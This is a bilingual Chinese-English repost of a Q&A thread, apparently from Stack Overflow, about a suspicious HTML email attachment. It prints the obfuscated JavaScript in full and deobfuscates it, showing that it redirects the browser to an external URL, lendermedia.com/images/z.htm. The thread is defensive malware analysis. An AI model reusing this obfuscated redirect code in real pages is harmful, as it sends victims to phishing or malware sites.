这个可疑的网络钓鱼代码有什么作用? [英] What does this suspicious phishing code do?

查看:118
本文介绍了这个可疑的网络钓鱼代码有什么作用?的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

我的一些非IT同事在电子邮件中打开了一个非常可疑的.html附件。当看起来运行了一些javascript代码时,它导致了一个空白屏幕。

A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

它做了什么?这超出了我的编程知识范围。

What did it do? It's beyond the scope of my programming knowledge.

推荐答案

它将重定向到一个网址,' http://lendermedia.com/images/z.htm '(自行承担风险)。

It will redirect to an url, 'http://lendermedia.com/images/z.htm' (follow it on your own risk).

将代码复制并粘贴到有价值的JavaScript编辑器中,并让它为您设置格式。

Copy and paste the code to a worthy JavaScript editor and have it format the source for you.

关键点:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h 将等于' http://lendermedia.com/images/z.htm '

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t 将包含对<$的引用c $ c> document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

名为 href 的属性 b ,此时(在另一个函数内)确实是 t ,从上面的语句中设置为 h ,这是网址。

The property named href of b, which at this point (inside another function) really is t from the above statement, is set to h, which is the url.

大多数代码仅仅是噪音,实际功能包括:

Most of the code is mere noise, the actual functionality consists of this:

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();

这篇关于这个可疑的网络钓鱼代码有什么作用?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆